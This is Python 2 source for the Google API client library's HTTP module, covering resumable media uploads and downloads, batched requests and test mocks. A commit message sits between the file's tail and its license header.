print "Download %d%%." % int(status.progress() * 100)
print "Download Complete!"
"""
def __init__(self, fd, request, chunksize=DEFAULT_CHUNK_SIZE):
"""Constructor.
Args:
fd: io.Base or file object, The stream in which to write the downloaded
bytes.
request: apiclient.http.HttpRequest, the media request to perform in
chunks.
chunksize: int, File will be downloaded in chunks of this many bytes.
"""
self._fd = fd
self._request = request
self._uri = request.uri
self._chunksize = chunksize
self._progress = 0
self._total_size = None
self._done = False
def next_chunk(self):
"""Get the next chunk of the download.
Returns:
(status, done): (MediaDownloadStatus, boolean)
The value of 'done' will be True when the media has been fully
downloaded.
Raises:
apiclient.errors.HttpError if the response was not a 2xx.
httplib2.Error if a transport error has occured.
"""
headers = {
'range': 'bytes=%d-%d' % (
self._progress, self._progress + self._chunksize)
}
http = self._request.http
http.follow_redirects = False
resp, content = http.request(self._uri, headers=headers)
if resp.status in [301, 302, 303, 307, 308] and 'location' in resp:
self._uri = resp['location']
resp, content = http.request(self._uri, headers=headers)
if resp.status in [200, 206]:
self._progress += len(content)
self._fd.write(content)
if 'content-range' in resp:
content_range = resp['content-range']
length = content_range.rsplit('/', 1)[1]
self._total_size = int(length)
if self._progress == self._total_size:
self._done = True
return MediaDownloadProgress(self._progress, self._total_size), self._done
else:
raise HttpError(resp, content, self._uri)
class HttpRequest(object):
"""Encapsulates a single HTTP request."""
def __init__(self, http, postproc, uri,
method='GET',
body=None,
headers=None,
methodId=None,
resumable=None):
"""Constructor for an HttpRequest.
Args:
http: httplib2.Http, the transport object to use to make a request
postproc: callable, called on the HTTP response and content to transform
it into a data object before returning, or raising an exception
on an error.
uri: string, the absolute URI to send the request to
method: string, the HTTP method to use
body: string, the request body of the HTTP request,
headers: dict, the HTTP request headers
methodId: string, a unique identifier for the API method being called.
resumable: MediaUpload, None if this is not a resumbale request.
"""
self.uri = uri
self.method = method
self.body = body
self.headers = headers or {}
self.methodId = methodId
self.http = http
self.postproc = postproc
self.resumable = resumable
self._in_error_state = False
# Pull the multipart boundary out of the content-type header.
major, minor, params = mimeparse.parse_mime_type(
headers.get('content-type', 'application/json'))
# The size of the non-media part of the request.
self.body_size = len(self.body or '')
# The resumable URI to send chunks to.
self.resumable_uri = None
# The bytes that have been uploaded.
self.resumable_progress = 0
def execute(self, http=None):
"""Execute the request.
Args:
http: httplib2.Http, an http object to be used in place of the
one the HttpRequest request object was constructed with.
Returns:
A deserialized object model of the response body as determined
by the postproc.
Raises:
apiclient.errors.HttpError if the response was not a 2xx.
httplib2.Error if a transport error has occured.
"""
if http is None:
http = self.http
if self.resumable:
body = None
while body is None:
_, body = self.next_chunk(http)
return body
else:
if 'content-length' not in self.headers:
self.headers['content-length'] = str(self.body_size)
resp, content = http.request(self.uri, self.method,
body=self.body,
headers=self.headers)
if resp.status >= 300:
raise HttpError(resp, content, self.uri)
return self.postproc(resp, content)
def next_chunk(self, http=None):
"""Execute the next step of a resumable upload.
Can only be used if the method being executed supports media uploads and
the MediaUpload object passed in was flagged as using resumable upload.
Example:
media = MediaFileUpload('cow.png', mimetype='image/png',
chunksize=1000, resumable=True)
request = farm.animals().insert(
id='cow',
name='cow.png',
media_body=media)
response = None
while response is None:
status, response = request.next_chunk()
if status:
print "Upload %d%% complete." % int(status.progress() * 100)
Returns:
(status, body): (ResumableMediaStatus, object)
The body will be None until the resumable media is fully uploaded.
Raises:
apiclient.errors.HttpError if the response was not a 2xx.
httplib2.Error if a transport error has occured.
"""
if http is None:
http = self.http
if self.resumable.size() is None:
size = '*'
else:
size = str(self.resumable.size())
if self.resumable_uri is None:
start_headers = copy.copy(self.headers)
start_headers['X-Upload-Content-Type'] = self.resumable.mimetype()
if size != '*':
start_headers['X-Upload-Content-Length'] = size
start_headers['content-length'] = str(self.body_size)
resp, content = http.request(self.uri, self.method,
body=self.body,
headers=start_headers)
if resp.status == 200 and 'location' in resp:
self.resumable_uri = resp['location']
else:
raise ResumableUploadError("Failed to retrieve starting URI.")
elif self._in_error_state:
# If we are in an error state then query the server for current state of
# the upload by sending an empty PUT and reading the 'range' header in
# the response.
headers = {
'Content-Range': 'bytes */%s' % size,
'content-length': '0'
}
resp, content = http.request(self.resumable_uri, 'PUT',
headers=headers)
status, body = self._process_response(resp, content)
if body:
# The upload was complete.
return (status, body)
data = self.resumable.getbytes(
self.resumable_progress, self.resumable.chunksize())
# A short read implies that we are at EOF, so finish the upload.
if len(data) < self.resumable.chunksize():
size = str(self.resumable_progress + len(data))
headers = {
'Content-Range': 'bytes %d-%d/%s' % (
self.resumable_progress, self.resumable_progress + len(data) - 1,
size)
}
try:
resp, content = http.request(self.resumable_uri, 'PUT',
body=data,
headers=headers)
except:
self._in_error_state = True
raise
return self._process_response(resp, content)
def _process_response(self, resp, content):
"""Process the response from a single chunk upload.
Args:
resp: httplib2.Response, the response object.
content: string, the content of the response.
Returns:
(status, body): (ResumableMediaStatus, object)
The body will be None until the resumable media is fully uploaded.
Raises:
apiclient.errors.HttpError if the response was not a 2xx or a 308.
"""
if resp.status in [200, 201]:
self._in_error_state = False
return None, self.postproc(resp, content)
elif resp.status == 308:
self._in_error_state = False
# A "308 Resume Incomplete" indicates we are not done.
self.resumable_progress = int(resp['range'].split('-')[1]) + 1
if 'location' in resp:
self.resumable_uri = resp['location']
else:
self._in_error_state = True
raise HttpError(resp, content, self.uri)
return (MediaUploadProgress(self.resumable_progress, self.resumable.size()),
None)
def to_json(self):
"""Returns a JSON representation of the HttpRequest."""
d = copy.copy(self.__dict__)
if d['resumable'] is not None:
d['resumable'] = self.resumable.to_json()
del d['http']
del d['postproc']
return simplejson.dumps(d)
@staticmethod
def from_json(s, http, postproc):
"""Returns an HttpRequest populated with info from a JSON object."""
d = simplejson.loads(s)
if d['resumable'] is not None:
d['resumable'] = MediaUpload.new_from_json(d['resumable'])
return HttpRequest(
http,
postproc,
uri=d['uri'],
method=d['method'],
body=d['body'],
headers=d['headers'],
methodId=d['methodId'],
resumable=d['resumable'])
class BatchHttpRequest(object):
"""Batches multiple HttpRequest objects into a single HTTP request.
Example:
from apiclient.http import BatchHttpRequest
def list_animals(request_id, response, exception):
\"\"\"Do something with the animals list response.\"\"\"
if exception is not None:
# Do something with the exception.
pass
else:
# Do something with the response.
pass
def list_farmers(request_id, response, exception):
\"\"\"Do something with the farmers list response.\"\"\"
if exception is not None:
# Do something with the exception.
pass
else:
# Do something with the response.
pass
service = build('farm', 'v2')
batch = BatchHttpRequest()
batch.add(service.animals().list(), list_animals)
batch.add(service.farmers().list(), list_farmers)
batch.execute(http)
"""
def __init__(self, callback=None, batch_uri=None):
"""Constructor for a BatchHttpRequest.
Args:
callback: callable, A callback to be called for each response, of the
form callback(id, response, exception). The first parameter is the
request id, and the second is the deserialized response object. The
third is an apiclient.errors.HttpError exception object if an HTTP error
occurred while processing the request, or None if no error occurred.
batch_uri: string, URI to send batch requests to.
"""
if batch_uri is None:
batch_uri = 'https://www.googleapis.com/batch'
self._batch_uri = batch_uri
# Global callback to be called for each individual response in the batch.
self._callback = callback
# A map from id to request.
self._requests = {}
# A map from id to callback.
self._callbacks = {}
# List of request ids, in the order in which they were added.
self._order = []
# The last auto generated id.
self._last_auto_id = 0
# Unique ID on which to base the Content-ID headers.
self._base_id = None
# A map from request id to (httplib2.Response, content) response pairs
self._responses = {}
# A map of id(Credentials) that have been refreshed.
self._refreshed_credentials = {}
def _refresh_and_apply_credentials(self, request, http):
"""Refresh the credentials and apply to the request.
Args:
request: HttpRequest, the request.
http: httplib2.Http, the global http object for the batch.
"""
# For the credentials to refresh, but only once per refresh_token
# If there is no http per the request then refresh the http passed in
# via execute()
creds = None
if request.http is not None and hasattr(request.http.request,
'credentials'):
creds = request.http.request.credentials
elif http is not None and hasattr(http.request, 'credentials'):
creds = http.request.credentials
if creds is not None:
if id(creds) not in self._refreshed_credentials:
creds.refresh(http)
self._refreshed_credentials[id(creds)] = 1
# Only apply the credentials if we are using the http object passed in,
# otherwise apply() will get called during _serialize_request().
if request.http is None or not hasattr(request.http.request,
'credentials'):
creds.apply(request.headers)
def _id_to_header(self, id_):
"""Convert an id to a Content-ID header value.
Args:
id_: string, identifier of individual request.
Returns:
A Content-ID header with the id_ encoded into it. A UUID is prepended to
the value because Content-ID headers are supposed to be universally
unique.
"""
if self._base_id is None:
self._base_id = uuid.uuid4()
return '<%s+%s>' % (self._base_id, urllib.quote(id_))
def _header_to_id(self, header):
"""Convert a Content-ID header value to an id.
Presumes the Content-ID header conforms to the format that _id_to_header()
returns.
Args:
header: string, Content-ID header value.
Returns:
The extracted id value.
Raises:
BatchError if the header is not in the expected format.
"""
if header[0] != '<' or header[-1] != '>':
raise BatchError("Invalid value for Content-ID: %s" % header)
if '+' not in header:
raise BatchError("Invalid value for Content-ID: %s" % header)
base, id_ = header[1:-1].rsplit('+', 1)
return urllib.unquote(id_)
def _serialize_request(self, request):
"""Convert an HttpRequest object into a string.
Args:
request: HttpRequest, the request to serialize.
Returns:
The request as a string in application/http format.
"""
# Construct status line
parsed = urlparse.urlparse(request.uri)
request_line = urlparse.urlunparse(
(None, None, parsed.path, parsed.params, parsed.query, None)
)
status_line = request.method + ' ' + request_line + ' HTTP/1.1\n'
major, minor = request.headers.get('content-type', 'application/json').split('/')
msg = MIMENonMultipart(major, minor)
headers = request.headers.copy()
if request.http is not None and hasattr(request.http.request,
'credentials'):
request.http.request.credentials.apply(headers)
# MIMENonMultipart adds its own Content-Type header.
if 'content-type' in headers:
del headers['content-type']
for key, value in headers.iteritems():
msg[key] = value
msg['Host'] = parsed.netloc
msg.set_unixfrom(None)
if request.body is not None:
msg.set_payload(request.body)
msg['content-length'] = str(len(request.body))
# Serialize the mime message.
fp = StringIO.StringIO()
# maxheaderlen=0 means don't line wrap headers.
g = Generator(fp, maxheaderlen=0)
g.flatten(msg, unixfrom=False)
body = fp.getvalue()
# Strip off the \n\n that the MIME lib tacks onto the end of the payload.
if request.body is None:
body = body[:-2]
return status_line.encode('utf-8') + body
def _deserialize_response(self, payload):
"""Convert string into httplib2 response and content.
Args:
payload: string, headers and body as a string.
Returns:
A pair (resp, content), such as would be returned from httplib2.request.
"""
# Strip off the status line
status_line, payload = payload.split('\n', 1)
protocol, status, reason = status_line.split(' ', 2)
# Parse the rest of the response
parser = FeedParser()
parser.feed(payload)
msg = parser.close()
msg['status'] = status
# Create httplib2.Response from the parsed headers.
resp = httplib2.Response(msg)
resp.reason = reason
resp.version = int(protocol.split('/', 1)[1].replace('.', ''))
content = payload.split('\r\n\r\n', 1)[1]
return resp, content
def _new_id(self):
"""Create a new id.
Auto incrementing number that avoids conflicts with ids already used.
Returns:
string, a new unique id.
"""
self._last_auto_id += 1
while str(self._last_auto_id) in self._requests:
self._last_auto_id += 1
return str(self._last_auto_id)
def add(self, request, callback=None, request_id=None):
"""Add a new request.
Every callback added will be paired with a unique id, the request_id. That
unique id will be passed back to the callback when the response comes back
from the server. The default behavior is to have the library generate it's
own unique id. If the caller passes in a request_id then they must ensure
uniqueness for each request_id, and if they are not an exception is
raised. Callers should either supply all request_ids or nevery supply a
request id, to avoid such an error.
Args:
request: HttpRequest, Request to add to the batch.
callback: callable, A callback to be called for this response, of the
form callback(id, response, exception). The first parameter is the
request id, and the second is the deserialized response object. The
third is an apiclient.errors.HttpError exception object if an HTTP error
occurred while processing the request, or None if no errors occurred.
request_id: string, A unique id for the request. The id will be passed to
the callback with the response.
Returns:
None
Raises:
BatchError if a media request is added to a batch.
KeyError is the request_id is not unique.
"""
if request_id is None:
request_id = self._new_id()
if request.resumable is not None:
raise BatchError("Media requests cannot be used in a batch request.")
if request_id in self._requests:
raise KeyError("A request with this ID already exists: %s" % request_id)
self._requests[request_id] = request
self._callbacks[request_id] = callback
self._order.append(request_id)
def _execute(self, http, order, requests):
"""Serialize batch request, send to server, process response.
Args:
http: httplib2.Http, an http object to be used to make the request with.
order: list, list of request ids in the order they were added to the
batch.
request: list, list of request objects to send.
Raises:
httplib2.Error if a transport error has occured.
apiclient.errors.BatchError if the response is the wrong format.
"""
message = MIMEMultipart('mixed')
# Message should not write out it's own headers.
setattr(message, '_write_headers', lambda self: None)
# Add all the individual requests.
for request_id in order:
request = requests[request_id]
msg = MIMENonMultipart('application', 'http')
msg['Content-Transfer-Encoding'] = 'binary'
msg['Content-ID'] = self._id_to_header(request_id)
body = self._serialize_request(request)
msg.set_payload(body)
message.attach(msg)
body = message.as_string()
headers = {}
headers['content-type'] = ('multipart/mixed; '
'boundary="%s"') % message.get_boundary()
resp, content = http.request(self._batch_uri, 'POST', body=body,
headers=headers)
if resp.status >= 300:
raise HttpError(resp, content, self._batch_uri)
# Now break out the individual responses and store each one.
boundary, _ = content.split(None, 1)
# Prepend with a content-type header so FeedParser can handle it.
header = 'content-type: %s\r\n\r\n' % resp['content-type']
for_parser = header + content
parser = FeedParser()
parser.feed(for_parser)
mime_response = parser.close()
if not mime_response.is_multipart():
raise BatchError("Response not in multipart/mixed format.", resp,
content)
for part in mime_response.get_payload():
request_id = self._header_to_id(part['Content-ID'])
response, content = self._deserialize_response(part.get_payload())
self._responses[request_id] = (response, content)
def execute(self, http=None):
"""Execute all the requests as a single batched HTTP request.
Args:
http: httplib2.Http, an http object to be used in place of the one the
HttpRequest request object was constructed with. If one isn't supplied
then use a http object from the requests in this batch.
Returns:
None
Raises:
httplib2.Error if a transport error has occured.
apiclient.errors.BatchError if the response is the wrong format.
"""
# If http is not supplied use the first valid one given in the requests.
if http is None:
for request_id in self._order:
request = self._requests[request_id]
if request is not None:
http = request.http
break
if http is None:
raise ValueError("Missing a valid http object.")
self._execute(http, self._order, self._requests)
# Loop over all the requests and check for 401s. For each 401 request the
# credentials should be refreshed and then sent again in a separate batch.
redo_requests = {}
redo_order = []
for request_id in self._order:
resp, content = self._responses[request_id]
if resp['status'] == '401':
redo_order.append(request_id)
request = self._requests[request_id]
self._refresh_and_apply_credentials(request, http)
redo_requests[request_id] = request
if redo_requests:
self._execute(http, redo_order, redo_requests)
# Now process all callbacks that are erroring, and raise an exception for
# ones that return a non-2xx response? Or add extra parameter to callback
# that contains an HttpError?
for request_id in self._order:
resp, content = self._responses[request_id]
request = self._requests[request_id]
callback = self._callbacks[request_id]
response = None
exception = None
try:
if resp.status >= 300:
raise HttpError(resp, content, request.uri)
response = request.postproc(resp, content)
except HttpError, e:
exception = e
if callback is not None:
callback(request_id, response, exception)
if self._callback is not None:
self._callback(request_id, response, exception)
class HttpRequestMock(object):
"""Mock of HttpRequest.
Do not construct directly, instead use RequestMockBuilder.
"""
def __init__(self, resp, content, postproc):
"""Constructor for HttpRequestMock
Args:
resp: httplib2.Response, the response to emulate coming from the request
content: string, the response body
postproc: callable, the post processing function usually supplied by
the model class. See model.JsonModel.response() as an example.
"""
self.resp = resp
self.content = content
self.postproc = postproc
if resp is None:
self.resp = httplib2.Response({'status': 200, 'reason': 'OK'})
if 'reason' in self.resp:
self.resp.reason = self.resp['reason']
def execute(self, http=None):
"""Execute the request.
Same behavior as HttpRequest.execute(), but the response is
mocked and not really from an HTTP request/response.
"""
return self.postproc(self.resp, self.content)
class RequestMockBuilder(object):
"""A simple mock of HttpRequest
Pass in a dictionary to the constructor that maps request methodIds to
tuples of (httplib2.Response, content, opt_expected_body) that should be
returned when that method is called. None may also be passed in for the
httplib2.Response, in which case a 200 OK response will be generated.
If an opt_expected_body (str or dict) is provided, it will be compared to
the body and UnexpectedBodyError will be raised on inequality.
Example:
response = '{"data": {"id": "tag:google.c...'
requestBuilder = RequestMockBuilder(
{
'plus.activities.get': (None, response),
}
)
apiclient.discovery.build("plus", "v1", requestBuilder=requestBuilder)
Methods that you do not supply a response for will return a
200 OK with an empty string as the response content or raise an excpetion
if check_unexpected is set to True. The methodId is taken from the rpcName
in the discovery document.
For more details see the project wiki.
"""
def __init__(self, responses, check_unexpected=False):
"""Constructor for RequestMockBuilder
The constructed object should be a callable object
that can replace the class HttpResponse.
responses - A dictionary that maps methodIds into tuples
of (httplib2.Response, content). The methodId
comes from the 'rpcName' field in the discovery
document.
check_unexpected - A boolean setting whether or not UnexpectedMethodError
should be raised on unsupplied method.
"""
self.responses = responses
self.check_unexpected = check_unexpected
def __call__(self, http, postproc, uri, method='GET', body=None,
headers=None, methodId=None, resumable=None):
"""Implements the callable interface that discovery.build() expects
of requestBuilder, which is to build an object compatible with
HttpRequest.execute(). See that method for the description of the
parameters and the expected response.
"""
if methodId in self.responses:
response = self.responses[methodId]
resp, content = response[:2]
if len(response) > 2:
# Test the body against the supplied expected_body.
expected_body = response[2]
if bool(expected_body) != bool(body):
# Not expecting a body and provided one
# or expecting a body and not provided one.
raise UnexpectedBodyError(expected_body, body)
if isinstance(expected_body, str):
expected_body = simplejson.loads(expected_body)
body = simplejson.loads(body)
if body != expected_body:
raise UnexpectedBodyError(expected_body, body)
return HttpRequestMock(resp, content, postproc)
elif self.check_unexpected:
raise UnexpectedMethodError(methodId)
else:
model = JsonModel(False)
return HttpRequestMock(None, '{}', model.response)
class HttpMock(object):
"""Mock of httplib2.Http"""
def __init__(self, filename, headers=None):
"""
Args:
filename: string, absolute filename to read response from
headers: dict, header to return with response
"""
if headers is None:
headers = {'status': '200 OK'}
f = file(filename, 'r')
self.data = f.read()
f.close()
self.headers = headers
def request(self, uri,
method='GET',
body=None,
headers=None,
redirections=1,
connection_type=None):
return httplib2.Response(self.headers), self.data
class HttpMockSequence(object):
"""Mock of httplib2.Http
Mocks a sequence of calls to request returning different responses for each
call. Create an instance initialized with the desired response headers
and content and then use as if an httplib2.Http instance.
http = HttpMockSequence([
({'status': '401'}, ''),
({'status': '200'}, '{"access_token":"1/3w","expires_in":3600}'),
({'status': '200'}, 'echo_request_headers'),
])
resp, content = http.request("http://examples.com")
There are special values you can pass in for content to trigger
behavours that are helpful in testing.
'echo_request_headers' means return the request headers in the response body
'echo_request_headers_as_json' means return the request headers in
the response body
'echo_request_body' means return the request body in the response body
'echo_request_uri' means return the request uri in the response body
"""
def __init__(self, iterable):
"""
Args:
iterable: iterable, a sequence of pairs of (headers, body)
"""
self._iterable = iterable
self.follow_redirects = True
def request(self, uri,
method='GET',
body=None,
headers=None,
redirections=1,
connection_type=None):
resp, content = self._iterable.pop(0)
if content == 'echo_request_headers':
content = headers
elif content == 'echo_request_headers_as_json':
content = simplejson.dumps(headers)
elif content == 'echo_request_body':
content = body
elif content == 'echo_request_uri':
content = uri
return httplib2.Response(resp), content
def set_user_agent(http, user_agent):
"""Set the user-agent on every request.
Args:
http - An instance of httplib2.Http
or something that acts like it.
user_agent: string, the value for the user-agent header.
Returns:
A modified instance of http that was passed in.
Example:
h = httplib2.Http()
h = set_user_agent(h, "my-app-name/6.0")
Most of the time the user-agent will be set doing auth, this is for the rare
cases where you are accessing an unauthenticated endpoint.
"""
request_orig = http.request
# The closure that will replace 'httplib2.Http.request'.
def new_request(uri, method='GET', body=None, headers=None,
redirections=httplib2.DEFAULT_MAX_REDIRECTS,
connection_type=None):
"""Modify the request headers to add the user-agent."""
if headers is None:
headers = {}
if 'user-agent' in headers:
headers['user-agent'] = user_agent + ' ' + headers['user-agent']
else:
headers['user-agent'] = user_agent
resp, content = request_orig(uri, method, body, headers,
redirections, connection_type)
return resp, content
http.request = new_request
return http
def tunnel_patch(http):
"""Tunnel PATCH requests over POST.
Args:
http - An instance of httplib2.Http
or something that acts like it.
Returns:
A modified instance of http that was passed in.
Example:
h = httplib2.Http()
h = tunnel_patch(h, "my-app-name/6.0")
Useful if you are running on a platform that doesn't support PATCH.
Apply this last if you are using OAuth 1.0, as changing the method
will result in a different signature.
"""
request_orig = http.request
# The closure that will replace 'httplib2.Http.request'.
def new_request(uri, method='GET', body=None, headers=None,
redirections=httplib2.DEFAULT_MAX_REDIRECTS,
connection_type=None):
"""Modify the request headers to add the user-agent."""
if headers is None:
headers = {}
if method == 'PATCH':
if 'oauth_token' in headers.get('authorization', ''):
logging.warning(
'OAuth 1.0 request made with Credentials after tunnel_patch.')
headers['x-http-method-override'] = "PATCH"
method = 'POST'
resp, content = request_orig(uri, method, body, headers,
redirections, connection_type)
return resp, content
http.request = new_request
return http
Fix comments to match reality. Fixes issue #170.
# Copyright (C) 2012 Google Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Classes to encapsulate a single HTTP request.
The classes implement a command pattern, with every
object supporting an execute() method that does the
actuall HTTP request.
"""
__author__ = 'jcgregorio@google.com (Joe Gregorio)'
import StringIO
import base64
import copy
import gzip
import httplib2
import mimeparse
import mimetypes
import os
import urllib
import urlparse
import uuid
from email.generator import Generator
from email.mime.multipart import MIMEMultipart
from email.mime.nonmultipart import MIMENonMultipart
from email.parser import FeedParser
from errors import BatchError
from errors import HttpError
from errors import ResumableUploadError
from errors import UnexpectedBodyError
from errors import UnexpectedMethodError
from model import JsonModel
from oauth2client.anyjson import simplejson
DEFAULT_CHUNK_SIZE = 512*1024
class MediaUploadProgress(object):
"""Status of a resumable upload."""
def __init__(self, resumable_progress, total_size):
"""Constructor.
Args:
resumable_progress: int, bytes sent so far.
total_size: int, total bytes in complete upload, or None if the total
upload size isn't known ahead of time.
"""
self.resumable_progress = resumable_progress
self.total_size = total_size
def progress(self):
"""Percent of upload completed, as a float.
Returns:
the percentage complete as a float, returning 0.0 if the total size of
the upload is unknown.
"""
if self.total_size is not None:
return float(self.resumable_progress) / float(self.total_size)
else:
return 0.0
class MediaDownloadProgress(object):
"""Status of a resumable download."""
def __init__(self, resumable_progress, total_size):
"""Constructor.
Args:
resumable_progress: int, bytes received so far.
total_size: int, total bytes in complete download.
"""
self.resumable_progress = resumable_progress
self.total_size = total_size
def progress(self):
"""Percent of download completed, as a float.
Returns:
the percentage complete as a float, returning 0.0 if the total size of
the download is unknown.
"""
if self.total_size is not None:
return float(self.resumable_progress) / float(self.total_size)
else:
return 0.0
class MediaUpload(object):
"""Describes a media object to upload.
Base class that defines the interface of MediaUpload subclasses.
Note that subclasses of MediaUpload may allow you to control the chunksize
when upload a media object. It is important to keep the size of the chunk as
large as possible to keep the upload efficient. Other factors may influence
the size of the chunk you use, particularly if you are working in an
environment where individual HTTP requests may have a hardcoded time limit,
such as under certain classes of requests under Google App Engine.
"""
def chunksize(self):
"""Chunk size for resumable uploads.
Returns:
Chunk size in bytes.
"""
raise NotImplementedError()
def mimetype(self):
"""Mime type of the body.
Returns:
Mime type.
"""
return 'application/octet-stream'
def size(self):
"""Size of upload.
Returns:
Size of the body, or None of the size is unknown.
"""
return None
def resumable(self):
"""Whether this upload is resumable.
Returns:
True if resumable upload or False.
"""
return False
def getbytes(self, begin, end):
"""Get bytes from the media.
Args:
begin: int, offset from beginning of file.
length: int, number of bytes to read, starting at begin.
Returns:
A string of bytes read. May be shorter than length if EOF was reached
first.
"""
raise NotImplementedError()
def _to_json(self, strip=None):
"""Utility function for creating a JSON representation of a MediaUpload.
Args:
strip: array, An array of names of members to not include in the JSON.
Returns:
string, a JSON representation of this instance, suitable to pass to
from_json().
"""
t = type(self)
d = copy.copy(self.__dict__)
if strip is not None:
for member in strip:
del d[member]
d['_class'] = t.__name__
d['_module'] = t.__module__
return simplejson.dumps(d)
def to_json(self):
"""Create a JSON representation of an instance of MediaUpload.
Returns:
string, a JSON representation of this instance, suitable to pass to
from_json().
"""
return self._to_json()
@classmethod
def new_from_json(cls, s):
"""Utility class method to instantiate a MediaUpload subclass from a JSON
representation produced by to_json().
Args:
s: string, JSON from to_json().
Returns:
An instance of the subclass of MediaUpload that was serialized with
to_json().
"""
data = simplejson.loads(s)
# Find and call the right classmethod from_json() to restore the object.
module = data['_module']
m = __import__(module, fromlist=module.split('.')[:-1])
kls = getattr(m, data['_class'])
from_json = getattr(kls, 'from_json')
return from_json(s)
class MediaFileUpload(MediaUpload):
"""A MediaUpload for a file.
Construct a MediaFileUpload and pass as the media_body parameter of the
method. For example, if we had a service that allowed uploading images:
media = MediaFileUpload('cow.png', mimetype='image/png',
chunksize=1024*1024, resumable=True)
farm.animals()..insert(
id='cow',
name='cow.png',
media_body=media).execute()
"""
def __init__(self, filename, mimetype=None, chunksize=DEFAULT_CHUNK_SIZE, resumable=False):
"""Constructor.
Args:
filename: string, Name of the file.
mimetype: string, Mime-type of the file. If None then a mime-type will be
guessed from the file extension.
chunksize: int, File will be uploaded in chunks of this many bytes. Only
used if resumable=True.
resumable: bool, True if this is a resumable upload. False means upload
in a single request.
"""
self._filename = filename
self._size = os.path.getsize(filename)
self._fd = None
if mimetype is None:
(mimetype, encoding) = mimetypes.guess_type(filename)
self._mimetype = mimetype
self._chunksize = chunksize
self._resumable = resumable
def chunksize(self):
"""Chunk size for resumable uploads.
Returns:
Chunk size in bytes.
"""
return self._chunksize
def mimetype(self):
"""Mime type of the body.
Returns:
Mime type.
"""
return self._mimetype
def size(self):
"""Size of upload.
Returns:
Size of the body, or None of the size is unknown.
"""
return self._size
def resumable(self):
"""Whether this upload is resumable.
Returns:
True if resumable upload or False.
"""
return self._resumable
def getbytes(self, begin, length):
"""Get bytes from the media.
Args:
begin: int, offset from beginning of file.
length: int, number of bytes to read, starting at begin.
Returns:
A string of bytes read. May be shorted than length if EOF was reached
first.
"""
if self._fd is None:
self._fd = open(self._filename, 'rb')
self._fd.seek(begin)
return self._fd.read(length)
def to_json(self):
"""Creating a JSON representation of an instance of MediaFileUpload.
Returns:
string, a JSON representation of this instance, suitable to pass to
from_json().
"""
return self._to_json(['_fd'])
@staticmethod
def from_json(s):
d = simplejson.loads(s)
return MediaFileUpload(
d['_filename'], d['_mimetype'], d['_chunksize'], d['_resumable'])
class MediaIoBaseUpload(MediaUpload):
"""A MediaUpload for a io.Base objects.
Note that the Python file object is compatible with io.Base and can be used
with this class also.
fh = io.BytesIO('...Some data to upload...')
media = MediaIoBaseUpload(fh, mimetype='image/png',
chunksize=1024*1024, resumable=True)
farm.animals().insert(
id='cow',
name='cow.png',
media_body=media).execute()
"""
def __init__(self, fd, mimetype, chunksize=DEFAULT_CHUNK_SIZE,
resumable=False):
"""Constructor.
Args:
fd: io.Base or file object, The source of the bytes to upload. MUST be
opened in blocking mode, do not use streams opened in non-blocking mode.
mimetype: string, Mime-type of the file. If None then a mime-type will be
guessed from the file extension.
chunksize: int, File will be uploaded in chunks of this many bytes. Only
used if resumable=True.
resumable: bool, True if this is a resumable upload. False means upload
in a single request.
"""
self._fd = fd
self._mimetype = mimetype
self._chunksize = chunksize
self._resumable = resumable
self._size = None
try:
if hasattr(self._fd, 'fileno'):
fileno = self._fd.fileno()
# Pipes and such show up as 0 length files.
size = os.fstat(fileno).st_size
if size:
self._size = os.fstat(fileno).st_size
except IOError:
pass
def chunksize(self):
"""Chunk size for resumable uploads.
Returns:
Chunk size in bytes.
"""
return self._chunksize
def mimetype(self):
"""Mime type of the body.
Returns:
Mime type.
"""
return self._mimetype
def size(self):
"""Size of upload.
Returns:
Size of the body, or None of the size is unknown.
"""
return self._size
def resumable(self):
"""Whether this upload is resumable.
Returns:
True if resumable upload or False.
"""
return self._resumable
def getbytes(self, begin, length):
"""Get bytes from the media.
Args:
begin: int, offset from beginning of file.
length: int, number of bytes to read, starting at begin.
Returns:
A string of bytes read. May be shorted than length if EOF was reached
first.
"""
self._fd.seek(begin)
return self._fd.read(length)
def to_json(self):
"""This upload type is not serializable."""
raise NotImplementedError('MediaIoBaseUpload is not serializable.')
class MediaInMemoryUpload(MediaUpload):
"""MediaUpload for a chunk of bytes.
Construct a MediaFileUpload and pass as the media_body parameter of the
method.
"""
def __init__(self, body, mimetype='application/octet-stream',
chunksize=DEFAULT_CHUNK_SIZE, resumable=False):
"""Create a new MediaBytesUpload.
Args:
body: string, Bytes of body content.
mimetype: string, Mime-type of the file or default of
'application/octet-stream'.
chunksize: int, File will be uploaded in chunks of this many bytes. Only
used if resumable=True.
resumable: bool, True if this is a resumable upload. False means upload
in a single request.
"""
self._body = body
self._mimetype = mimetype
self._resumable = resumable
self._chunksize = chunksize
def chunksize(self):
"""Chunk size for resumable uploads.
Returns:
Chunk size in bytes.
"""
return self._chunksize
def mimetype(self):
"""Mime type of the body.
Returns:
Mime type.
"""
return self._mimetype
def size(self):
"""Size of upload.
Returns:
Size of the body, or None of the size is unknown.
"""
return len(self._body)
def resumable(self):
"""Whether this upload is resumable.
Returns:
True if resumable upload or False.
"""
return self._resumable
def getbytes(self, begin, length):
"""Get bytes from the media.
Args:
begin: int, offset from beginning of file.
length: int, number of bytes to read, starting at begin.
Returns:
A string of bytes read. May be shorter than length if EOF was reached
first.
"""
return self._body[begin:begin + length]
def to_json(self):
"""Create a JSON representation of a MediaInMemoryUpload.
Returns:
string, a JSON representation of this instance, suitable to pass to
from_json().
"""
t = type(self)
d = copy.copy(self.__dict__)
del d['_body']
d['_class'] = t.__name__
d['_module'] = t.__module__
d['_b64body'] = base64.b64encode(self._body)
return simplejson.dumps(d)
@staticmethod
def from_json(s):
d = simplejson.loads(s)
return MediaInMemoryUpload(base64.b64decode(d['_b64body']),
d['_mimetype'], d['_chunksize'],
d['_resumable'])
class MediaIoBaseDownload(object):
""""Download media resources.
Note that the Python file object is compatible with io.Base and can be used
with this class also.
Example:
request = farms.animals().get_media(id='cow')
fh = io.FileIO('cow.png', mode='wb')
downloader = MediaIoBaseDownload(fh, request, chunksize=1024*1024)
done = False
while done is False:
status, done = downloader.next_chunk()
if status:
print "Download %d%%." % int(status.progress() * 100)
print "Download Complete!"
"""
